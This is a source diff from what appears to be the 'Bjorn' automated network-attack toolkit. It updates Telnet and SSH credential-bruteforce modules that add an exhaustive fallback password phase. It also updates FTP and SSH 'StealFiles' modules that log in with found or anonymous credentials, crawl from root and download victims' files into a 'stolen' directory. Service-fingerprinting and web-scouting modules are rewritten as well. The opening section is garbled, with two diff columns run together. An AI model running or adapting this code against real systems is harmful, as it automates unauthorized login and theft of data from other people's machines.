success_flag = [False] success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count): def run_phase(passwords):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True) phase_tasks = len(self.users) * len(passwords)
t.start() if phase_tasks == 0:
threads.append(t) return
while not self.queue.empty(): for user in self.users:
if self.shared_data.orchestrator_should_exit: for password in passwords:
logger.info("Orchestrator exit signal received, stopping bruteforce.") if self.shared_data.orchestrator_should_exit:
# clear queue logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
while not self.queue.empty(): return
try: self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join() threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
for t in threads: try:
t.join() run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
return success_flag[0], self.results # Return True and the list of successes if any logger.info(
f"SSH dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__": if __name__ == "__main__":

View File

@@ -108,20 +108,28 @@ class StealFilesFTP:
return out return out
# -------- FTP helpers -------- # -------- FTP helpers --------
def connect_ftp(self, ip: str, username: str, password: str) -> Optional[FTP]: # Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
# Max recursion depth for directory traversal (avoids symlink loops)
_MAX_DEPTH = 5
def connect_ftp(self, ip: str, username: str, password: str, port: int = b_port) -> Optional[FTP]:
try: try:
ftp = FTP() ftp = FTP()
ftp.connect(ip, b_port, timeout=10) ftp.connect(ip, port, timeout=10)
ftp.login(user=username, passwd=password) ftp.login(user=username, passwd=password)
self.ftp_connected = True self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP as {username}") logger.info(f"Connected to {ip}:{port} via FTP as {username}")
return ftp return ftp
except Exception as e: except Exception as e:
logger.info(f"FTP connect failed {ip} {username}:{password}: {e}") logger.info(f"FTP connect failed {ip}:{port} {username}: {e}")
return None return None
def find_files(self, ftp: FTP, dir_path: str) -> List[str]: def find_files(self, ftp: FTP, dir_path: str, depth: int = 0) -> List[str]:
files: List[str] = [] files: List[str] = []
if depth > self._MAX_DEPTH:
logger.debug(f"Max recursion depth reached at {dir_path}")
return []
try: try:
if self.shared_data.orchestrator_should_exit or self.stop_execution: if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.") logger.info("File search interrupted.")
@@ -136,7 +144,7 @@ class StealFilesFTP:
try: try:
ftp.cwd(item) # if ok -> directory ftp.cwd(item) # if ok -> directory
files.extend(self.find_files(ftp, os.path.join(dir_path, item))) files.extend(self.find_files(ftp, os.path.join(dir_path, item), depth + 1))
ftp.cwd('..') ftp.cwd('..')
except Exception: except Exception:
# not a dir => file candidate # not a dir => file candidate
@@ -146,11 +154,19 @@ class StealFilesFTP:
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP") logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e: except Exception as e:
logger.error(f"FTP path error {dir_path}: {e}") logger.error(f"FTP path error {dir_path}: {e}")
raise
return files return files
def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None: def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
try: try:
# Check file size before downloading
try:
size = ftp.size(remote_file)
if size is not None and size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # SIZE not supported, try download anyway
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/')) local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True) os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f: with open(local_file_path, 'wb') as f:
@@ -161,6 +177,7 @@ class StealFilesFTP:
# -------- Orchestrator entry -------- # -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str: def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
timer = None
try: try:
self.shared_data.bjorn_orch_status = b_class self.shared_data.bjorn_orch_status = b_class
try: try:
@@ -168,11 +185,14 @@ class StealFilesFTP:
except Exception: except Exception:
port_i = b_port port_i = b_port
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
creds = self._get_creds_for_target(ip, port_i) creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}") logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
def try_anonymous() -> Optional[FTP]: def try_anonymous() -> Optional[FTP]:
return self.connect_ftp(ip, 'anonymous', '') return self.connect_ftp(ip, 'anonymous', '', port=port_i)
if not creds and not try_anonymous(): if not creds and not try_anonymous():
logger.error(f"No FTP credentials for {ip}. Skipping.") logger.error(f"No FTP credentials for {ip}. Skipping.")
@@ -192,9 +212,11 @@ class StealFilesFTP:
# Anonymous first # Anonymous first
ftp = try_anonymous() ftp = try_anonymous()
if ftp: if ftp:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname}
files = self.find_files(ftp, '/') files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous") local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
if files: if files:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files: for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit: if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.") logger.info("Execution interrupted.")
@@ -207,7 +229,6 @@ class StealFilesFTP:
except Exception: except Exception:
pass pass
if success: if success:
timer.cancel()
return 'success' return 'success'
# Authenticated creds # Authenticated creds
@@ -216,13 +237,15 @@ class StealFilesFTP:
logger.info("Execution interrupted.") logger.info("Execution interrupted.")
break break
try: try:
logger.info(f"Trying FTP {username}:{password} @ {ip}") self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
ftp = self.connect_ftp(ip, username, password) logger.info(f"Trying FTP {username} @ {ip}:{port_i}")
ftp = self.connect_ftp(ip, username, password, port=port_i)
if not ftp: if not ftp:
continue continue
files = self.find_files(ftp, '/') files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}") local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
if files: if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files: for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit: if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.") logger.info("Execution interrupted.")
@@ -235,14 +258,15 @@ class StealFilesFTP:
except Exception: except Exception:
pass pass
if success: if success:
timer.cancel()
return 'success' return 'success'
except Exception as e: except Exception as e:
logger.error(f"FTP loot error {ip} {username}: {e}") logger.error(f"FTP loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed' return 'success' if success else 'failed'
except Exception as e: except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}") logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed' return 'failed'
finally:
if timer:
timer.cancel()

View File

@@ -218,23 +218,41 @@ class StealFilesSSH:
logger.info(f"Found {len(matches)} matching files in {dir_path}") logger.info(f"Found {len(matches)} matching files in {dir_path}")
return matches return matches
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None: def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
""" """
Download a single remote file into the given local dir, preserving subdirs. Download a single remote file into the given local dir, preserving subdirs.
Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
""" """
sftp = ssh.open_sftp() sftp = ssh.open_sftp()
self.sftp_connected = True # first time we open SFTP, mark as connected self.sftp_connected = True # first time we open SFTP, mark as connected
# Preserve partial directory structure under local_dir try:
remote_dir = os.path.dirname(remote_file) # Check file size before downloading
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/')) try:
os.makedirs(local_file_dir, exist_ok=True) st = sftp.stat(remote_file)
if st.st_size and st.st_size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # stat failed, try download anyway
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file)) # Preserve partial directory structure under local_dir
sftp.get(remote_file, local_file_path) remote_dir = os.path.dirname(remote_file)
sftp.close() local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
logger.success(f"Downloaded: {remote_file} -> {local_file_path}") local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
finally:
try:
sftp.close()
except Exception:
pass
# --------------------- Orchestrator entrypoint --------------------- # --------------------- Orchestrator entrypoint ---------------------
@@ -247,6 +265,7 @@ class StealFilesSSH:
- status_key: action name (b_class) - status_key: action name (b_class)
Returns 'success' if at least one file stolen; else 'failed'. Returns 'success' if at least one file stolen; else 'failed'.
""" """
timer = None
try: try:
self.shared_data.bjorn_orch_status = b_class self.shared_data.bjorn_orch_status = b_class
@@ -256,6 +275,9 @@ class StealFilesSSH:
except Exception: except Exception:
port_i = b_port port_i = b_port
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
creds = self._get_creds_for_target(ip, port_i) creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}") logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
if not creds: if not creds:
@@ -283,12 +305,14 @@ class StealFilesSSH:
break break
try: try:
logger.info(f"Trying credential {username}:{password} for {ip}") self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying credential {username} for {ip}")
ssh = self.connect_ssh(ip, username, password, port=port_i) ssh = self.connect_ssh(ip, username, password, port=port_i)
# Search from root; filtered by config # Search from root; filtered by config
files = self.find_files(ssh, '/') files = self.find_files(ssh, '/')
if files: if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files: for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit: if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted during download.") logger.info("Execution interrupted during download.")
@@ -310,12 +334,14 @@ class StealFilesSSH:
# Stay quiet on Paramiko internals; just log the reason and try next cred # Stay quiet on Paramiko internals; just log the reason and try next cred
logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}") logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")
timer.cancel()
return 'success' if success_any else 'failed' return 'success' if success_any else 'failed'
except Exception as e: except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}") logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed' return 'failed'
finally:
if timer:
timer.cancel()
if __name__ == "__main__": if __name__ == "__main__":

View File

@@ -1,9 +1,9 @@
""" """
telnet_bruteforce.py Telnet bruteforce (DB-backed, no CSV/JSON, no rich) telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur - Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts - IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='telnet') - Succès -> DB.creds (service='telnet')
- Conserve la logique dorigine (telnetlib, queue/threads) - Conserve la logique d’origine (telnetlib, queue/threads)
""" """
import os import os
@@ -15,6 +15,7 @@ from queue import Queue
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
from shared import SharedData from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger from logger import Logger
logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG) logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
@@ -43,20 +44,21 @@ class TelnetBruteforce:
return self.telnet_bruteforce.run_bruteforce(ip, port) return self.telnet_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key): def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed').""" """Point d'entrée orchestrateur (retour 'success' / 'failed')."""
logger.info(f"Executing TelnetBruteforce on {ip}:{port}") logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
self.shared_data.bjorn_orch_status = "TelnetBruteforce" self.shared_data.bjorn_orch_status = "TelnetBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_telnet(ip, port) success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed' return 'success' if success else 'failed'
class TelnetConnector: class TelnetConnector:
"""Gère les tentatives Telnet, persistance DB, mapping IP(MAC, Hostname).""" """Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data): def __init__(self, shared_data):
self.shared_data = shared_data self.shared_data = shared_data
# Wordlists inchangées # Wordlists inchangées
self.users = self._read_lines(shared_data.users_file) self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file) self.passwords = self._read_lines(shared_data.passwords_file)
@@ -67,6 +69,7 @@ class TelnetConnector:
self.lock = threading.Lock() self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port] self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue() self.queue = Queue()
self.progress = None
# ---------- util fichiers ---------- # ---------- util fichiers ----------
@staticmethod @staticmethod
@@ -110,9 +113,10 @@ class TelnetConnector:
return self._ip_to_identity.get(ip, (None, None))[1] return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- Telnet ---------- # ---------- Telnet ----------
def telnet_connect(self, adresse_ip: str, user: str, password: str) -> bool: def telnet_connect(self, adresse_ip: str, user: str, password: str, port: int = 23, timeout: int = 10) -> bool:
timeout = int(getattr(self.shared_data, "telnet_connect_timeout_s", timeout))
try: try:
tn = telnetlib.Telnet(adresse_ip) tn = telnetlib.Telnet(adresse_ip, port=port, timeout=timeout)
tn.read_until(b"login: ", timeout=5) tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n") tn.write(user.encode('ascii') + b"\n")
if password: if password:
@@ -175,14 +179,17 @@ class TelnetConnector:
adresse_ip, user, password, mac_address, hostname, port = self.queue.get() adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try: try:
if self.telnet_connect(adresse_ip, user, password): if self.telnet_connect(adresse_ip, user, password, port=port):
with self.lock: with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port]) self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}") logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results() self.save_results()
self.removeduplicates() self.removeduplicates()
success_flag[0] = True success_flag[0] = True
finally: finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done() self.queue.task_done()
# Optional delay between attempts # Optional delay between attempts
@@ -191,46 +198,54 @@ class TelnetConnector:
def run_bruteforce(self, adresse_ip: str, port: int): def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip) mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or "" hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords) dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0: if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.") logger.warning("No users/passwords loaded. Abort.")
return False, [] return False, []
for user in self.users: self.progress = ProgressTracker(self.shared_data, total_tasks)
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False] success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count): def run_phase(passwords):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True) phase_tasks = len(self.users) * len(passwords)
t.start() if phase_tasks == 0:
threads.append(t) return
while not self.queue.empty(): for user in self.users:
if self.shared_data.orchestrator_should_exit: for password in passwords:
logger.info("Orchestrator exit signal received, stopping bruteforce.") if self.shared_data.orchestrator_should_exit:
while not self.queue.empty(): logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
try: return
self.queue.get_nowait() self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.queue.task_done()
except Exception:
break
break
self.queue.join() threads = []
for t in threads: thread_count = min(8, max(1, phase_tasks))
t.join() for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
return success_flag[0], self.results self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"Telnet dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ---------- # ---------- persistence DB ----------
def save_results(self): def save_results(self):
@@ -270,3 +285,4 @@ if __name__ == "__main__":
except Exception as e: except Exception as e:
logger.error(f"Error: {e}") logger.error(f"Error: {e}")
exit(1) exit(1)

View File

@@ -1,214 +1,191 @@
# Service fingerprinting and version detection tool for vulnerability identification. #!/usr/bin/env python3
# Saves settings in `/home/bjorn/.settings_bjorn/thor_hammer_settings.json`. # -*- coding: utf-8 -*-
# Automatically loads saved settings if arguments are not provided. """
# -t, --target Target IP or hostname to scan (overrides saved value). thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).
# -p, --ports Ports to scan (default: common ports, comma-separated).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/services). What it does:
# -d, --delay Delay between probes in seconds (default: 1). - For a given target (ip, port), tries a fast TCP connect + banner grab.
# -v, --verbose Enable verbose output for detailed service information. - Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
Notes:
- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
"""
import os
import json
import socket
import argparse
import threading
from datetime import datetime
import logging import logging
from concurrent.futures import ThreadPoolExecutor import socket
import subprocess import time
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="thor_hammer.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ThorHammer"
b_module = "thor_hammer"
b_status = "ThorHammer"
b_port = None
b_parent = None
b_service = '["ssh","ftp","telnet","http","https","smb","mysql","postgres","mssql","rdp","vnc"]'
b_trigger = "on_port_change"
b_priority = 35
b_action = "normal"
b_cooldown = 1200
b_rate_limit = "24/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
def _guess_service_from_port(port: int) -> str:
mapping = {
21: "ftp",
22: "ssh",
23: "telnet",
25: "smtp",
53: "dns",
80: "http",
110: "pop3",
139: "netbios-ssn",
143: "imap",
443: "https",
445: "smb",
1433: "mssql",
3306: "mysql",
3389: "rdp",
5432: "postgres",
5900: "vnc",
8080: "http",
}
return mapping.get(int(port), "")
b_class = "ThorHammer"
b_module = "thor_hammer"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/services"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "thor_hammer_settings.json")
DEFAULT_PORTS = [21, 22, 23, 25, 53, 80, 110, 115, 139, 143, 194, 443, 445, 1433, 3306, 3389, 5432, 5900, 8080]
# Service signature database
SERVICE_SIGNATURES = {
21: {
'name': 'FTP',
'vulnerabilities': {
'vsftpd 2.3.4': 'Backdoor command execution',
'ProFTPD 1.3.3c': 'Remote code execution'
}
},
22: {
'name': 'SSH',
'vulnerabilities': {
'OpenSSH 5.3': 'Username enumeration',
'OpenSSH 7.2p1': 'User enumeration timing attack'
}
},
# Add more signatures as needed
}
class ThorHammer: class ThorHammer:
def __init__(self, target, ports=None, output_dir=DEFAULT_OUTPUT_DIR, delay=1, verbose=False): def __init__(self, shared_data):
self.target = target self.shared_data = shared_data
self.ports = ports or DEFAULT_PORTS
self.output_dir = output_dir
self.delay = delay
self.verbose = verbose
self.results = {
'target': target,
'timestamp': datetime.now().isoformat(),
'services': {}
}
self.lock = threading.Lock()
def probe_service(self, port): def _connect_and_banner(self, ip: str, port: int, timeout_s: float, max_bytes: int) -> Tuple[bool, str]:
"""Probe a specific port for service information.""" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout_s)
try: try:
# Initial connection test if s.connect_ex((ip, int(port))) != 0:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) return False, ""
sock.settimeout(self.delay) try:
result = sock.connect_ex((self.target, port)) data = s.recv(max_bytes)
banner = (data or b"").decode("utf-8", errors="ignore").strip()
if result == 0: except Exception:
service_info = { banner = ""
'port': port, return True, banner
'state': 'open', finally:
'service': None, try:
'version': None, s.close()
'vulnerabilities': [] except Exception:
pass
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else None
except Exception:
port_i = None
# If port is missing, try to infer from row 'Ports' and fingerprint a few.
ports_to_check = []
if port_i:
ports_to_check = [port_i]
else:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for p in ports_txt.split(";"):
p = p.strip()
if p.isdigit():
ports_to_check.append(int(p))
ports_to_check = ports_to_check[:12] # Pi Zero guard
if not ports_to_check:
return "failed"
timeout_s = float(getattr(self.shared_data, "thor_connect_timeout_s", 1.5))
max_bytes = int(getattr(self.shared_data, "thor_banner_max_bytes", 1024))
source = str(getattr(self.shared_data, "thor_source", "thor_hammer"))
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
self.shared_data.bjorn_orch_status = "ThorHammer"
self.shared_data.bjorn_status_text2 = ip
self.shared_data.comment_params = {"ip": ip, "port": str(ports_to_check[0])}
progress = ProgressTracker(self.shared_data, len(ports_to_check))
try:
any_open = False
for p in ports_to_check:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
ok, banner = self._connect_and_banner(ip, p, timeout_s=timeout_s, max_bytes=max_bytes)
any_open = any_open or ok
service = _guess_service_from_port(p)
product = ""
version = ""
fingerprint = banner[:200] if banner else ""
confidence = 0.4 if ok else 0.1
state = "open" if ok else "closed"
self.shared_data.comment_params = {
"ip": ip,
"port": str(p),
"open": str(int(ok)),
"svc": service or "?",
} }
# Get service banner # Persist to DB if method exists.
try: try:
banner = sock.recv(1024).decode('utf-8', errors='ignore').strip() if hasattr(self.shared_data, "db") and hasattr(self.shared_data.db, "upsert_port_service"):
service_info['banner'] = banner self.shared_data.db.upsert_port_service(
except: mac_address=mac or "",
service_info['banner'] = None ip=ip,
port=int(p),
protocol="tcp",
state=state,
service=service or None,
product=product or None,
version=version or None,
banner=banner or None,
fingerprint=fingerprint or None,
confidence=float(confidence),
source=source,
)
except Exception as e:
logger.error(f"DB upsert_port_service failed for {ip}:{p}: {e}")
# Advanced service detection using nmap if available progress.advance(1)
try:
nmap_output = subprocess.check_output(
['nmap', '-sV', '-p', str(port), '-T4', self.target],
stderr=subprocess.DEVNULL
).decode()
# Parse nmap output
for line in nmap_output.split('\n'):
if str(port) in line and 'open' in line:
service_info['service'] = line.split()[2]
if len(line.split()) > 3:
service_info['version'] = ' '.join(line.split()[3:])
except:
pass
# Check for known vulnerabilities progress.set_complete()
if port in SERVICE_SIGNATURES: return "success" if any_open else "failed"
sig = SERVICE_SIGNATURES[port] finally:
service_info['service'] = service_info['service'] or sig['name'] self.shared_data.bjorn_progress = ""
if service_info['version']: self.shared_data.comment_params = {}
for vuln_version, vuln_desc in sig['vulnerabilities'].items(): self.shared_data.bjorn_status_text2 = ""
if vuln_version.lower() in service_info['version'].lower():
service_info['vulnerabilities'].append({
'version': vuln_version,
'description': vuln_desc
})
with self.lock:
self.results['services'][port] = service_info
if self.verbose:
logging.info(f"Service detected on port {port}: {service_info['service']}")
sock.close() # -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
except Exception as e: parser = argparse.ArgumentParser(description="ThorHammer (service fingerprint)")
logging.error(f"Error probing port {port}: {e}") parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="22")
def save_results(self):
"""Save scan results to a JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(self.output_dir, f"service_scan_{timestamp}.json")
with open(filename, 'w') as f:
json.dump(self.results, f, indent=4)
logging.info(f"Results saved to {filename}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the service scanning and fingerprinting process."""
logging.info(f"Starting service scan on {self.target}")
with ThreadPoolExecutor(max_workers=10) as executor:
executor.map(self.probe_service, self.ports)
self.save_results()
return self.results
def save_settings(target, ports, output_dir, delay, verbose):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"ports": ports,
"output_dir": output_dir,
"delay": delay,
"verbose": verbose
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Service fingerprinting and vulnerability detection tool")
parser.add_argument("-t", "--target", help="Target IP or hostname")
parser.add_argument("-p", "--ports", help="Ports to scan (comma-separated)")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-d", "--delay", type=float, default=1, help="Delay between probes")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
args = parser.parse_args() args = parser.parse_args()
settings = load_settings() sd = SharedData()
target = args.target or settings.get("target") act = ThorHammer(sd)
ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS) row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": "", "Ports": args.port}
output_dir = args.output or settings.get("output_dir") print(act.execute(args.ip, args.port, row, "ThorHammer"))
delay = args.delay or settings.get("delay")
verbose = args.verbose or settings.get("verbose")
if not target:
logging.error("Target is required. Use -t or save it in settings")
return
save_settings(target, ports, output_dir, delay, verbose)
scanner = ThorHammer(
target=target,
ports=ports,
output_dir=output_dir,
delay=delay,
verbose=verbose
)
scanner.execute()
if __name__ == "__main__":
main()

View File

@@ -1,313 +1,396 @@
# Web application scanner for discovering hidden paths and vulnerabilities. #!/usr/bin/env python3
# Saves settings in `/home/bjorn/.settings_bjorn/valkyrie_scout_settings.json`. # -*- coding: utf-8 -*-
# Automatically loads saved settings if arguments are not provided. """
# -u, --url Target URL to scan (overrides saved value). valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).
# -w, --wordlist Path to directory wordlist (default: built-in list).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/webscan). What it does:
# -t, --threads Number of concurrent threads (default: 10). - Probes a small set of common web paths on a target (ip, port).
# -d, --delay Delay between requests in seconds (default: 0.1). - Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
error/debug strings). No exploitation, no bruteforce.
- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import os
import json import json
import requests
import argparse
from datetime import datetime
import logging import logging
import threading
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urljoin
import re import re
from bs4 import BeautifulSoup import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
